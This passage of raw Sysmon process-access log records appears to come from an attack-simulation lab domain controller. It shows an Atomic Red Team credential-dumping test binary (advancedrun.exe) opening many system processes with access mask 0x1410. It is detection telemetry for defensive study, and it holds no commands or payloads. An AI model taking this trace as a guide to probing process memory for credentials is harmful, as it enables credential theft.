exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003943832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 